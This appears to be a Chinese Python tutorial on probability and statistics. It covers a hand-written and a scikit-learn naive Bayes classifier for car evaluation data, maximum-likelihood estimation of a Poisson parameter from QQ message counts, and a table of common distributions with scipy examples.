    df = pd.DataFrame(rdata) # 读入数据到 DATAFrame 变量 df,类似二维表
    df.columns = columnsName # 设置 df 的列名
    return df


    def getTrainTest(data, trainNum):
    """
    随机抽取数据,将数据集分成训练集和测试集
    :return: 训练集, 测试集
    """
    # 从 0 到 len(data)整数列表中随机截取 trainNum 个整数片段
    """
    语法:random.sample(sequence, k)
    参数:
    sequence: 可以是一个列表,元组,字符串,或集合
    k: 一个整数值,它指定一个样本的长度
    返回:从序列中选择元素的 k 长度的新列表。
    """
    choose = random.sample(range(len(data)), trainNum)
    choose.sort()
    j = 1
    dftrain = pd.DataFrame(columns=columnsName)
    dftest = pd.DataFrame(columns=columnsName)
    for i in range(1,len(data)):
    # 如果被随机选中,加入训练集,否则测试集
    if (j < trainNum and i == choose[j]):
    dftrain.loc[dftrain.shape[0]]=data.iloc[i]
    j += 1
    else:
    dftest.loc[dftrain.shape[0]]=data.iloc[i]
    return dftrain, dftest

    3.创建一个实现朴素贝叶斯模型的类 NBClassify

    4.定义训练函数 train()

    5.数据预测

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    38
    39
    40
    41
    42
    43
    44
    45
    46
    47
    48
    49
    50
    51
    52
    53
    54
    55
    56
    57
    58
    59
    60
    61
    62
    63
    64
    65
    66
    67
    68
    69
    70
    71
    72
    73
    74
    75
    76
    77
    78
    79
    80
    81
    82
    83
    84
    85
    86
    87
    88
    89
    90
    91
    class NBClassify(object):
    """
    定义朴素贝叶斯模型
    """
    def __init__(self):
    # tabProbablity 核心字典,记录各类别的先验概率,格式:{'unacc':概率值, 'acc': 概率值, 'vgood': 概率值, 'good': 概率值}
    _tagProbablity = None
    # featuresProbablity 核心字典,记录各类别下各特征取值的条件概率。三级字典,
    # 格式:类别 1: {'特征 1': {'值 1': 概率值, ...'值 n': 概率值}, '特征 2':{}...},类别 2:{'特征 1': {'值 1': 概率值, ...'值 n': 概率值},
    _featuresProbablity = None

    def train(self,df):
    """
    4.定义训练函数
    利用训练数据分别计算类先验概率和似然概率
    """
    # value_counts: 查看 label 这一列的计数结果
    self._tagProbablity = df['label'].value_counts(value for value in df['label'])
    print("各类别的先验概率(各类别占比):\n", self._tagProbablity)

    # 计算各特征及对应取值的出现次数 dictFeaturesBase
    # 格式:{特征 1:{值 1:出现 5 次, 值 2:出现 1 次}, 特征 2:{值 1:出现 1 次, 值 2:出现 5 次}}
    dictFeaturesBase = {}.fromkeys(df.columns) # 创建一个字典
    for column in df.columns: # 遍历数据各列
    seriesFeature = df[column].value_counts()
    dictFeaturesBase[column] = seriesFeature
    # 从特征值字典删去类别信息
    del dictFeaturesBase['label']

    # 初始化字典 dictFeatures
    # 格式:{类别 1:{'特征 1':{'值 1':None,...'值 n':None},'特征 2':{...}},类别 2:{'特征 1':{'值 1':None, ...},...}
    dictFeatures = {}.fromkeys(df['label'])
    for key in dictFeatures.keys():
    dictFeatures[key] = {}.fromkeys([key for key in dictFeaturesBase])
    for key, value in dictFeatures.items():
    for subkey in value.keys():
    value[subkey] = {}.fromkeys([x for x in dictFeaturesBase[subkey].keys()])
    # 计算各类别、对应特征及对应取值的出现次数,存入字典 dictFeatures
    for i in range(0, len(df)):
    label = df.iloc[i]['label'] # df.iloc: 官方文档定义为“基于整数位置的索引,用于按位置进行选择。类别
    for feature in columnsName[0:6]: # 对应的特征
    fvalue = df.iloc[i][feature] # 对应的特征取值
    if dictFeatures[label][feature][fvalue] == None:
    dictFeatures[label][feature][fvalue] = 1 # 该类别下该特征值第一个出现的样本
    else:
    dictFeatures[label][feature][fvalue] += 1 # 如果已有,次数加一

    # 该类数据集若未涵盖此特征值时,加入 Laplace 平滑项
    # 拉普拉斯平滑(Laplace Smoothing)又被称为加 1 平滑,是比较常用的平滑方法。
    # 平滑方法的存在时为了解决零概率问题。比较多地出现在文本分类问题的概率处理上
    # https://blog.csdn.net/weixin_43868020/article/details/106602799
    for tag, featuresDict in dictFeatures.items():
    for featureName, featureValueDict in featuresDict.items():
    for featureKey, featureValues in featureValueDict.items():
    if featureValues == None:
    featureValueDict[featureKey] = 1

    # 由字典 dictFeatures 计算每个类别下每种特征对应值的概率,即特征的似然概率 P(feature|tag)
    for tag, featuresDict in dictFeatures.items():
    for featureName, featureValueDict in featuresDict.items():
    totalCount = sum([x for x in featureValueDict.values() if x != None])
    for featureKey, featureValues in featureValueDict.items():
    featureValueDict[featureKey] = featureValues / totalCount
    self._featuresProbablity = dictFeatures
    print("每个类别下每种特征对应值的似然概率:\n", dictFeatures)

    def classify(self, featureTuple):
    """
    对测试集进行预测
    :return: 最大后验概率的类别
    """
    resultDict = {}
    # 计算样本属于每个类别的后验概率
    for tag, featuresDict in self._featuresProbablity.items():
    iNumList = []
    i=0
    # 将各特征值对应的似然概率添加到列表 iNumList
    for feature,featureValueDict in featuresDict.items():
    featureValue = str(featureTuple[i])
    iNumList.append(self._featuresProbablity[tag][feature][featureValue])
    i=i+1
    # 列表 iNumList 中的概率相乘,得到似然概率
    conditionProbability = 1
    for iNum in iNumList:
    conditionProbability *= iNum
    # 将先验概率乘以似然概率得到后验概率 resultDict
    resultDict[tag] = self._tagProbablity[tag] * conditionProbability
    # 对比每个类别的后验概率 resultDict 的大小
    resultList = sorted(resultDict.items(), key=lambda x: x[1], reverse=True)
    # 返回最大后验概率的类别
    return resultList[0][0]

    6.主程序

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    if __name__ == '__main__':
    dfData = getDataSet('car.txt')
    # 避免过拟合,采用交叉验证,随机选取 1500 个数据作为测试集,剩余为训练集
    # 交叉验证: 在给定的建模样本中,拿出大部分样本进行建模型,留小部分样本用刚建立的模型进行预报,
    # 并求这小部分样本的预报误差,记录它们的平方加和。
    trainData, testData = getTrainTest(dfData, 1500)
    # 定义朴素贝叶斯模型
    model = NBClassify()
    # 代入训练数据集,进行模型训练
    model.train(trainData)
    # 对测试数据集进行预测,并计算错误率
    errorCount = 0
    for i in range(0, len(testData)):
    result = model.classify(testData.iloc[i][0:6])
    # 将预测的类别和实际值比较
    if testData.iloc[i][6] != result:
    errorCount += 1
    print("精度为 %f" % ((float(len(testData)) - float(errorCount)) / len(testData)))
    各类别的先验概率: unacc    0.701134acc      0.223482good     0.040027vgood    0.035357Name: label, dtype: float64每个类别下每种特征对应值的似然概率: {'unacc': {'buying': {'low': 0.21693625118934348, 'med': 0.22645099904852523, 'vhigh': 0.29590865842055186, 'high': 0.26070409134157946}, 'maint': {'med': 0.23311132254995243, 'vhigh': 0.29971455756422455, 'high': 0.25499524262607043, 'low': 0.21217887725975262}, 'doors': {'4': 0.24262607040913417, '2': 0.26831588962892483, '5more': 0.2407231208372978, '3': 0.2483349191246432}, 'persons': {'4': 0.2597526165556613, '2': 0.47573739295908657, 'more': 0.26450999048525214}, 'lug-boot': {'med': 0.3273073263558516, 'big': 0.3016175071360609, 'small': 0.37107516650808753}, 'safety': {'med': 0.29305423406279735, 'high': 0.2340627973358706, 'low': 0.47288296860133205}}, 'acc': {'buying': {'low': 0.2417910447761194, 'med': 0.2955223880597015, 'vhigh': 0.18507462686567164, 'high': 0.27761194029850744}, 'maint': {'med': 0.3044776119402985, 'vhigh': 0.1791044776119403, 'high': 0.27761194029850744, 'low': 0.23880597014925373}, 'doors': {'4': 0.2716417910447761, '2': 0.21791044776119403, '5more': 0.2626865671641791, '3': 0.24776119402985075}, 'persons': {'4': 0.5238095238095238, '2': 0.002976190476190476, 'more': 0.4732142857142857}, 'lug-boot': {'med': 0.35522388059701493, 'big': 0.382089552238806, 'small': 0.2626865671641791}, 'safety': {'med': 0.4791666666666667, 'high': 0.5178571428571429, 'low': 0.002976190476190476}}, 'vgood': {'buying': {'low': 0.5636363636363636, 'med': 0.4, 'vhigh': 0.01818181818181818, 'high': 0.01818181818181818}, 'maint': {'med': 0.3888888888888889, 'vhigh': 0.018518518518518517, 'high': 0.18518518518518517, 'low': 0.4074074074074074}, 'doors': {'4': 0.32075471698113206, '2': 0.16981132075471697, '5more': 0.3018867924528302, '3': 0.20754716981132076}, 'persons': {'4': 0.4444444444444444, '2': 0.018518518518518517, 'more': 0.5370370370370371}, 'lug-boot': {'med': 0.37037037037037035, 'big': 0.6111111111111112, 'small': 0.018518518518518517}, 'safety': {'med': 0.01818181818181818, 'high': 0.9636363636363636, 'low': 0.01818181818181818}}, 'good': {'buying': {'low': 0.6612903225806451, 'med': 0.3064516129032258, 'vhigh': 0.016129032258064516, 'high': 0.016129032258064516}, 'maint': {'med': 0.3225806451612903, 'vhigh': 0.016129032258064516, 'high': 0.016129032258064516, 'low': 0.6451612903225806}, 'doors': {'4': 0.2833333333333333, '2': 0.23333333333333334, '5more': 0.26666666666666666, '3': 0.21666666666666667}, 'persons': {'4': 0.5081967213114754, '2': 0.01639344262295082, 'more': 0.47540983606557374}, 'lug-boot': {'med': 0.3333333333333333, 'big': 0.35, 'small': 0.31666666666666665}, 'safety': {'med': 0.5409836065573771, 'high': 0.4426229508196721, 'low': 0.01639344262295082}}}精度为 0.848485

    7.利用 scikit-mean 库直接实现朴素贝叶斯方法

    • Scikit-learn 是一个开源的机器学习库,它支持有监督和无监督的学习。它还提供了用于模型拟合,数据预处理,模型选择和评估以及许多其他实用程序的各种工具。

    • 包含 3 个朴素贝叶斯的分类算法

    种类说明适用
    GaussianNB假设每个标签的数据都服从简单的正态分布样本的特征的分布大部分是连续值
    MultinationalNB假设特征是由一个简单多项式分布生成的用于描述出现次数或者出现比例的特征
    BernoulliNB假设特征的先验概率为二元伯努利分布样本特征是二元离散值或很稀疏的多元离散值
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    38
    39
    40
    41
    42
    43
    44
    45
    46
    47
    48
    49
    50
    51
    import pandas as pd
    import numpy as np
    import random
    from sklearn.naive_bayes import BernoulliNB

    columnsName=['buying', 'maint', 'doors', 'persons','lug-boot','safety','label']


    def getDataSet(file):
    """
    从数据集中获得数据,并进行整理
    """
    fr = open(file)
    rdata = []
    for line in fr.readlines():
    tmp = line.strip().split(',')
    rdata.append(tmp)
    df = pd.DataFrame(rdata)
    df.columns = columnsName
    # feature_codes 记录特征及数据标签的编码表,如:'buying'特征的取值及对应的编码:'vhigh': 0, 'high': 1, 'med': 2, 'low': 3
    feature_codes = [{'vhigh': 0, 'high': 1, 'med': 2, 'low': 3},
    {'vhigh': 0, 'high': 1, 'med': 2, 'low': 3},
    {'2': 0, '3': 1, '4': 2, '5more': 3},
    {'2': 0, '4': 1, 'more': 2},
    {'small': 0, 'med': 1, 'big': 2},
    {'high': 0, 'med': 1, 'low': 2},
    {'unacc':0,'acc': 1,'good': 2,'vgood':3} ]
    for i in range(0,7):
    df.iloc[:, i] = df.iloc[:,i].map(feature_codes[i])
    # Xtrain, Xtest, Ytrain, Ytest = train_test_split(df.iloc[:, 1:6], df.iloc[:, 7], test_size=0.17, random_state=420)
    return df


    def getTrainTest(data, trainNum):
    """
    随机抽取数据,将数据集分成训练集和测试集
    """
    # 从 0 到 len(data)整数列表中随机截取 trainNum 个片段
    choose = random.sample(range(len(data)), trainNum)
    choose.sort()
    j = 1
    dftrain = pd.DataFrame(columns=columnsName)
    dftest = pd.DataFrame(columns=columnsName)
    for i in range(1,len(data)):
    # 如果被随机选中,加入训练集,否则测试集
    if (j < trainNum and i == choose[j]):
    dftrain.loc[dftrain.shape[0]]=data.iloc[i]
    j += 1
    else:
    dftest.loc[dftrain.shape[0]]=data.iloc[i]
    return dftrain, dftest
    1
    2
    dfData = getDataSet('car.txt')
    dfData
    buying maint doors persons lug-boot safety label
    0 0 0 0 0 0 2 0
    1 0 0 0 0 0 1 0
    2 0 0 0 0 0 0 0
    3 0 0 0 0 1 2 0
    4 0 0 0 0 1 1 0
    ... ... ... ... ... ... ... ...
    1723 3 3 3 2 1 1 2
    1724 3 3 3 2 1 0 3
    1725 3 3 3 2 2 2 0
    1726 3 3 3 2 2 1 2
    1727 3 3 3 2 2 0 3

    1728 rows × 7 columns

    1
    2
    3
    4
    5
    6
    7
    8
    # 设置训练集和测试集
    trainData, testData = getTrainTest(dfData, 1500)
    train_X = trainData.iloc[:, :-1]
    train_Y = np.asarray(trainData.iloc[:, -1], dtype="|S6")
    test_X = testData.iloc[:, :-1]
    test_Y = np.asarray(testData.iloc[:, -1], dtype="|S6")

    train_X
    buying maint doors persons lug-boot safety
    0 0 0 0 0 0 1
    1 0 0 0 0 0 0
    2 0 0 0 0 1 1
    3 0 0 0 0 2 2
    4 0 0 0 0 2 1
    ... ... ... ... ... ... ...
    1494 3 3 3 2 1 1
    1495 3 3 3 2 1 0
    1496 3 3 3 2 2 2
    1497 3 3 3 2 2 1
    1498 3 3 3 2 2 0

    1499 rows × 6 columns

    1
    train_Y  # 训练集的测评结果
    array([b'0', b'0', b'0', ..., b'0', b'2', b'3'], dtype='|S6')
    1
    test_X # 训练集输入
    buying maint doors persons lug-boot safety
    2 0 0 0 0 1 2
    3 0 0 0 0 1 0
    11 0 0 0 1 1 0
    26 0 0 1 0 1 2
    29 0 0 1 0 2 1
    ... ... ... ... ... ... ...
    1458 3 3 2 0 2 0
    1460 3 3 2 1 0 0
    1465 3 3 2 1 2 0
    1476 3 3 3 0 0 0
    1489 3 3 3 1 2 1

    204 rows × 6 columns

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    """
    alpha : 浮点数, 可不填 (默认为 1.0)
    拉普拉斯或利德斯通平滑的参数λ,如果设置为 0 则表示完全没有平滑选项。
    但是需要注意的是,平滑相当于人为给概率加上一些噪音,
    因此λ设置得越大,伯努利朴素贝叶斯的精确性会越低(虽然影响不是非常大),布里尔分数也会逐渐升高。
    binarize : 浮点数或 None,可不填,默认为 0
    将特征二值化的阈值,如果设定为 None,则假定为特征已经被二值化完毕
    fit_prior : 布尔值, 可不填 (默认为 True)
    是否学习先验概率 P(Y=c)。如果设置为 false,则不使用先验概率,而使用统一先验概率(uniform prior),
    即认为每个标签类出现的概率是 1/n_classes
    class_prior:形似数组的结构,结构为(n_classes, ),可不不填(默认为 None)
    """
    clf = BernoulliNB()
    clf.fit(train_X, train_Y) # 训练
    predicted = clf.predict(test_X)
    predicted
    array([b'0', b'0', b'0', b'0', b'0', b'0', b'0', b'0', b'0', b'0', b'0',       b'0', b'0', b'0', b'0', b'0', b'0', b'0', b'0', b'1', b'0', b'0',       b'0', b'0', b'0', b'1', b'0', b'0', b'0', b'0', b'0', b'0', b'1',       b'0', b'1', b'0', b'0', b'0', b'0', b'0', b'0', b'1', b'0', b'0',       b'0', b'0', b'0', b'0', b'0', b'0', b'0', b'0', b'0', b'0', b'0',       b'1', b'0', b'0', b'0', b'0', b'0', b'1', b'0', b'0', b'0', b'1',       b'0', b'0', b'0', b'0', b'0', b'0', b'1', b'1', b'0', b'0', b'0',       b'0', b'1', b'1', b'0', b'0', b'1', b'0', b'0', b'0', b'1', b'0',       b'0', b'0', b'0', b'1', b'0', b'0', b'0', b'0', b'0', b'0', b'0',       b'1', b'1', b'0', b'1', b'0', b'0', b'0', b'0', b'0', b'0', b'0',       b'0', b'1', b'1', b'0', b'0', b'0', b'0', b'0', b'0', b'0', b'0',       b'0', b'0', b'0', b'0', b'0', b'1', b'0', b'0', b'0', b'0', b'0',       b'0', b'0', b'1', b'0', b'1', b'0', b'0', b'0', b'0', b'0', b'0',       b'0', b'0', b'1', b'0', b'1', b'0', b'0', b'0', b'1', b'0', b'1',       b'0', b'0', b'0', b'0', b'0', b'0', b'0', b'0', b'0', b'0', b'1',       b'1', b'1', b'0', b'0', b'0', b'0', b'0', b'1', b'0', b'0', b'0',       b'0', b'0', b'0', b'0', b'0', b'0', b'0', b'0', b'0', b'0', b'0',       b'0', b'0', b'0', b'1', b'1', b'0', b'0', b'0', b'0', b'1', b'0',       b'0', b'0', b'1', b'1', b'0', b'0'], dtype='|S1')
print('Accuracy: %f' % np.mean(predicted == test_Y))
Accuracy: 0.774725
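Following up on the alpha notes above, here is a minimal sketch (reusing train_X/train_Y/test_X/test_Y from above) of how changing the smoothing parameter nudges the accuracy; the exact numbers depend on the random train/test split.

import numpy as np
from sklearn.naive_bayes import BernoulliNB

for alpha in (0.01, 0.1, 1.0, 10.0):
    model = BernoulliNB(alpha=alpha)
    model.fit(train_X, train_Y)
    acc = np.mean(model.predict(test_X) == test_Y)
    print("alpha=%-5s accuracy=%.4f" % (alpha, acc))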

8.7 Worked Example 2: Estimating Model Parameters by Maximum Likelihood

The dataset QQ_data.csv records the number of QQ messages sent each day; we use maximum likelihood to estimate the parameters of the underlying distribution

(1) Read the dataset "QQ_data.csv" and show the distribution of the data

    import pandas as pd
    import matplotlib.pyplot as plt

messages = pd.read_csv('QQ_data.csv') # read the data
    fig = plt.figure(figsize=(12,5))
    plt.title('Frequency of QQmessages')
    plt.xlabel('Number of QQmessages')
    plt.ylabel('Frequency')
plt.hist(messages['numbers'].values, range=[0, 60], bins=60, histtype='stepfilled') # histogram of the "numbers" column
    plt.show()

[Figure: histogram of daily QQ message counts]

(2) Estimate the parameter $\mu$ by maximum likelihood

The likelihood function is defined as:

$L(x;\mu)=\prod_{i=1}^{n}P(x_i;\mu)$

For computational convenience, we usually take the logarithm of both sides:

$\ln L(x;\mu)=\sum_{i=1}^{n}\ln P(x_i;\mu)$

import matplotlib.pyplot as plt
import numpy as np
import pandas as pd
import scipy
import scipy.stats as stats
import scipy.optimize as opt
import statsmodels.api as sm

messages = pd.read_csv('QQ_data.csv') # read the data
y_obs = messages['numbers'].values
np.seterr(invalid='ignore')


def poisson_logprob(mu, sign=-1):
    """
    :param mu: parameter of the Poisson model
    :param sign: coefficient (-1 turns maximization into minimization)
    :return: total log-likelihood of the observed data
    """
    print("current mu:", mu)
    # stats.poisson.logpmf(y_obs, mu=mu) evaluates the log of the Poisson pmf
    # (with parameter mu) at each observed value, and np.sum adds them up to
    # give the log-likelihood.
    return np.sum(sign * stats.poisson.logpmf(y_obs, mu=mu))


# opt.minimize_scalar iteratively adjusts the parameter (mu) to find the
# minimum of the objective; since the log-likelihood is negated (sign=-1),
# minimizing it maximizes the likelihood.
# https://vimsky.com/examples/usage/python-scipy.optimize.minimize_scalar.html
freq_results = opt.minimize_scalar(poisson_logprob)
print("Estimated mu: %s" % freq_results['x'])

current mu: 0.0
current mu: 1.0
current mu: 2.6180339999999998
current mu: 5.2360680251559995
current mu: 5.273849359457559
current mu: 5.334980842922849
current mu: 9.032120508519583
current mu: 15.014218190203728
current mu: 14.555935077084984
current mu: 24.69345563048985
current mu: 15.014218190203728
current mu: 18.71135779832006
current mu: 20.996315778882625
current mu: 18.38937216738971
current mu: 18.18406664294854
current mu: 18.217827603959925
current mu: 18.219046315052577
current mu: 18.2189342781152
current mu: 18.218934914073003
current mu: 18.21893518372324
current mu: 18.218934644422767
Estimated mu: 18.218934644422767
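Since the Poisson log-likelihood has a closed-form maximizer (setting its derivative to zero gives $\hat\mu=\bar{y}$), the optimizer's answer can be sanity-checked against the sample mean; a minimal sketch, reusing the same file:

import pandas as pd

y = pd.read_csv('QQ_data.csv')['numbers'].values
# d/dmu of sum(y_i ln(mu) - mu - ln(y_i!)) is sum(y_i)/mu - n = 0  =>  mu = mean(y)
print("sample mean:", y.mean())  # should match the optimizer's ~18.2189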

(3) Visualize the process of optimizing $\mu$ via the likelihood function

x = np.linspace(1, 60)
y_min = np.min([poisson_logprob(i, sign=1) for i in x])
y_max = np.max([poisson_logprob(i, sign=1) for i in x])
# Plot the log-likelihood of the dataset as mu varies over [1, 60]
fig = plt.figure(figsize=(6, 4))
plt.plot(x, [poisson_logprob(mu, sign=1) for mu in x])
plt.fill_between(x, [poisson_logprob(mu, sign=1) for mu in x],
                 y_min, color='#348ABD', alpha=0.3)
# Dashed red line at the mu that maximizes the likelihood
plt.vlines(freq_results['x'], y_max, y_min, colors='red', linestyles='dashed')
plt.scatter(freq_results['x'], y_max, s=110, c='red', zorder=3)
plt.ylim(y_min, 0)
plt.title('Optimization of $\mu$')
plt.xlabel('$\mu$')
plt.ylabel('Log probability of $\mu$ given data')
plt.show()

[Figure: log-likelihood curve over μ, with the maximum marked in red]

(4) Plot the Poisson distribution with the estimated $\mu$

x_lim = 60
mu = int(freq_results['x'])
for i in np.arange(x_lim):
    plt.bar(i, stats.poisson.pmf(i, mu), color='#348ABD') # bar chart; note pmf(k, mu), not pmf(mu, k)
plt.xlim(0, x_lim)
plt.ylim(0, 0.1)
plt.title('Estimated Poisson distribution for QQmessages')
plt.xlabel('Number of QQmessages')
plt.ylabel('Probability mass')
plt.legend(['$\mu$ = %s' % mu])
plt.show()

[Figure: estimated Poisson pmf for daily QQ message counts]

8.9 Exercises

(1) Write a naive Bayes classifier

The data contain 3 classes, {cold, allergy, concussion}; predict the diagnosis for a construction worker who sneezes

By Bayes' rule:

${\color{Red}{P(A|B)}}={\color{Blue}{P(A)}}{\color{Green}{\frac{P(B|A)}{P(B)}}}$

Posterior = prior × likelihood function

Rewritten for the classification task:

$P(\text{class}\mid\text{features})=P(\text{class})\frac{P(\text{features}\mid\text{class})}{P(\text{features})}$

So:

$P(\text{allergy}\mid\text{sneeze},\text{worker})=P(\text{allergy})\frac{P(\text{sneeze}\mid\text{allergy})\cdot {\color{Red}{P(\text{worker}\mid\text{allergy})}}}{P(\text{sneeze},\text{worker})}$
$P(\text{cold}\mid\text{sneeze},\text{worker})=P(\text{cold})\frac{P(\text{sneeze}\mid\text{cold})\cdot P(\text{worker}\mid\text{cold})}{P(\text{sneeze},\text{worker})}$
$P(\text{concussion}\mid\text{sneeze},\text{worker})=P(\text{concussion})\frac{{\color{Red}{P(\text{sneeze}\mid\text{concussion})}}\cdot P(\text{worker}\mid\text{concussion})}{P(\text{sneeze},\text{worker})}$

where:

$P(\text{sneeze},\text{worker})=P(\text{allergy})P(\text{sneeze}\mid\text{allergy}){\color{Red}{P(\text{worker}\mid\text{allergy})}}+$

$P(\text{cold})P(\text{sneeze}\mid\text{cold})P(\text{worker}\mid\text{cold})+P(\text{concussion}){\color{Red}{P(\text{sneeze}\mid\text{concussion})}}P(\text{worker}\mid\text{concussion})$

The red factors are zero in the data below (no allergic construction worker, no sneezing concussion case), so only the cold term survives:

$=P(\text{cold})P(\text{sneeze}\mid\text{cold})P(\text{worker}\mid\text{cold})$

$=\frac{1}{2}\cdot\frac{2}{3}\cdot\frac{1}{3}$

$=\frac{1}{9}$

The numerator of the cold posterior equals this denominator, so we predict that the sneezing construction worker has a cold
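A minimal sketch of the same computation done by hand, with the fractions read straight off the six-row table that follows (nothing here comes from sklearn):

# Priors from the 6 rows: cold 3/6, allergy 1/6, concussion 2/6
# Likelihoods: P(sneeze|cold)=2/3, P(worker|cold)=1/3,
#              P(worker|allergy)=0, P(sneeze|concussion)=0
p_cold  = (3/6) * (2/3) * (1/3)   # = 1/9
p_aller = (1/6) * 1.0  * 0.0      # no allergic construction worker in the data
p_conc  = (2/6) * 0.0  * (1/2)    # no sneezing concussion case in the data
evidence = p_cold + p_aller + p_conc
print(p_cold / evidence)          # 1.0 -> predict cold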

    import numpy as np
    import pandas as pd
    from sklearn.naive_bayes import BernoulliNB

# Values kept in Chinese to match the original dataset:
# 护士=nurse, 农夫=farmer, 建筑工人=construction worker, 教师=teacher;
# 打喷嚏=sneeze, 头痛=headache; 感冒=cold, 过敏=allergy, 脑震荡=concussion
data = np.array([["护士", "打喷嚏", "感冒"], ["农夫", "打喷嚏", "过敏"], ["建筑工人", "头痛", "脑震荡"],
                 ["建筑工人", "头痛", "感冒"], ["教师", "打喷嚏", "感冒"], ["教师", "头痛", "脑震荡"]])
    df = pd.DataFrame(data, columns=["职业", "症状", "类别"])
    df
    职业 症状 类别
    0 护士 打喷嚏 感冒
    1 农夫 打喷嚏 过敏
    2 建筑工人 头痛 脑震荡
    3 建筑工人 头痛 感冒
    4 教师 打喷嚏 感冒
    5 教师 头痛 脑震荡
feature_codes = [{'护士': 0, '农夫': 1, '建筑工人': 2, '教师': 3},
                 {'打喷嚏': 0, '头痛': 1},
                 {'感冒': 0, '过敏': 1, '脑震荡': 2}]
for i in range(0, len(df.columns)):
    df.iloc[:, i] = df.iloc[:, i].map(feature_codes[i])
    df
    职业 症状 类别
    0 0 0 0
    1 1 0 1
    2 2 1 2
    3 2 1 0
    4 3 0 0
    5 3 1 2
    train_X = df[['职业', '症状']]
    train_Y = df['类别']
    train_X
    职业 症状
    0 0 0
    1 1 0
    2 2 1
    3 2 1
    4 3 0
    5 3 1
test_X = pd.DataFrame(np.array([[2, 0]]), columns=["职业", "症状"]) # the sneezing construction worker, as numeric codes
    test_X
    职业 症状
    0 2 0
    clf = BernoulliNB()
    clf.fit(train_X, train_Y)
clf.predict(test_X) # class 0 = 感冒 (cold)
    array([0], dtype=int64)

9 Common Distributions of Random Variables

Let's first organize these distributions in a table.

• Discrete

| PMF | Name | Notation | Mean $E(X)$ | Variance $D(X)$ | Notes |
| --- | --- | --- | --- | --- | --- |
| $P\{X=0\}=1-p,\ P\{X=1\}=p$ | 0-1 (Bernoulli) | $X\sim B(1,p)$ | $p$ | $p(1-p)$ | The binomial with n = 1, e.g. a single coin toss |
| $P\{X=k\}=C_n^k p^k q^{n-k}$ | Binomial | $X\sim B(n,p)$ | $np$ | $np(1-p)$ | The event {X=k} is "A occurs exactly k times in n trials" |
| $P\{X=k\}=pq^{k-1}$ | Geometric | $X\sim GE(p)$ | $\frac{1}{p}$ | $\frac{1-p}{p^2}$ | Probability that the first success in a run of Bernoulli trials occurs on trial k |
| $P\{X=k\}=\frac{C_M^k C_{N-M}^{n-k}}{C_N^n}$ | Hypergeometric | $X\sim H(N,n,M)$ | | | Number of items of a designated kind obtained when n items are drawn without replacement from N items, M of which are of that kind |
| $P\{X=k\}=\frac{\lambda^k}{k!}e^{-\lambda}$ | Poisson | $X\sim \pi(\lambda)$ | $\lambda$ | $\lambda$ | Counts of random events per unit time; approximates the binomial (good accuracy when $p \le 0.1$) |

• Continuous

| PDF | Name | Notation | Mean $E(X)$ | Variance $D(X)$ | Notes |
| --- | --- | --- | --- | --- | --- |
| $f(x)=\frac{1}{b-a}$ for $a<x<b$; 0 otherwise | Uniform | $X\sim U(a,b)$ | $\frac{a+b}{2}$ | $\frac{(b-a)^2}{12}$ | Also called the rectangular distribution |
| $f(x;\mu,\sigma)=\frac{1}{\sqrt{2\pi\sigma^2}}e^{-\frac{(x-\mu)^2}{2\sigma^2}}$ | Normal | $X\sim N(\mu,\sigma^2)$ | $\mu$ | $\sigma^2$ | |
| $f(x)=\lambda e^{-\lambda x}$ for $x>0$; 0 otherwise | Exponential | $X\sim E(\lambda)$ | $\frac{1}{\lambda}$ | $\frac{1}{\lambda^2}$ | The only memoryless continuous distribution: given $x>s$, $P(x>s+t)=P(x>t)$ |
| $f(x;n)=\frac{1}{2^{n/2}\Gamma(n/2)}x^{n/2-1}e^{-x/2}$ for $x>0$; 0 for $x\le 0$ | Chi-square | $U\sim \chi^2(n)$ | $n$ | $2n$ | |
| | t distribution | $Z\sim t(n)$ | 0 (even density) | | With $X\sim N(0,1)$, $Y\sim \chi^2(n)$, $t=\frac{X}{\sqrt{Y/n}}$; as $n\to \infty$ it approaches the standard normal |
| | F distribution | $F\sim F(n_1,n_2)$ | | | With $U\sim \chi^2(n_1)$, $V\sim \chi^2(n_2)$ independent, $F=\frac{U/n_1}{V/n_2}$ |
| | Gamma | $X\sim \Gamma(\alpha,\beta)$ | | | The exponential and chi-square distributions are special cases of the gamma |
| | Beta | $X\sim Beta(\alpha,\beta)$ | $\frac{\alpha}{\alpha+\beta}$ | $\frac{\alpha\beta}{(\alpha+\beta)^2(\alpha+\beta+1)}$ | A distribution over probabilities: $x$ is an estimate of an event's probability, and $\alpha-1$, $\beta-1$ count how often the event did and did not occur |
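Since the table singles out the exponential distribution's memorylessness, here is a minimal numeric check with scipy (λ, s and t chosen arbitrarily):

from scipy.stats import expon

lam, s, t = 0.5, 1.0, 2.0
# sf(x) = P(X > x); memorylessness means P(X > s+t) / P(X > s) == P(X > t)
lhs = expon.sf(s + t, scale=1/lam) / expon.sf(s, scale=1/lam)
rhs = expon.sf(t, scale=1/lam)
print(lhs, rhs)  # identical up to floating point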

9.1.3 Computing the Normal Distribution with Python Libraries

1. Generating normal random variables

    from scipy.stats import norm

print(norm.rvs(), end="\n\n") # one draw from the standard normal (mean 0, std 1)

print(norm.rvs(size=10), end="\n\n") # 10 draws from the standard normal

print(norm.rvs(loc=10, scale=0.1), end="\n\n") # one draw with mean 10, std 0.1
-0.15606449742155645

[ 1.41915385e+00  9.05180924e-01 -1.65805601e+00 -8.70872873e-05  6.25728572e-01  3.07949177e+00  5.22917613e-01 -6.20181230e-01 -1.23960758e+00  7.47657082e-02]

9.901121362547995

2. Computing normal probabilities

    from scipy.stats import norm

    print("P(X < 0.3) = {}".format(norm.cdf(0.3)))

    print("P(-0.2 < X < 0.2) = {}".format(norm.cdf(0.2) - norm.cdf(-0.2)))
P(X < 0.3) = 0.6179114221889526
P(-0.2 < X < 0.2) = 0.15851941887820603

3. Plotting the standard normal distribution

import numpy as np
import scipy.stats as stats
import matplotlib.pyplot as plt
import matplotlib.style as style
import matplotlib as mpl
from IPython.core.display import HTML

# PLOTTING CONFIG
"""
%matplotlib inline is an IPython magic: it embeds figures in the notebook and
makes plt.show() unnecessary. Without it, plt.show() is needed to display the figure.
"""
%matplotlib inline
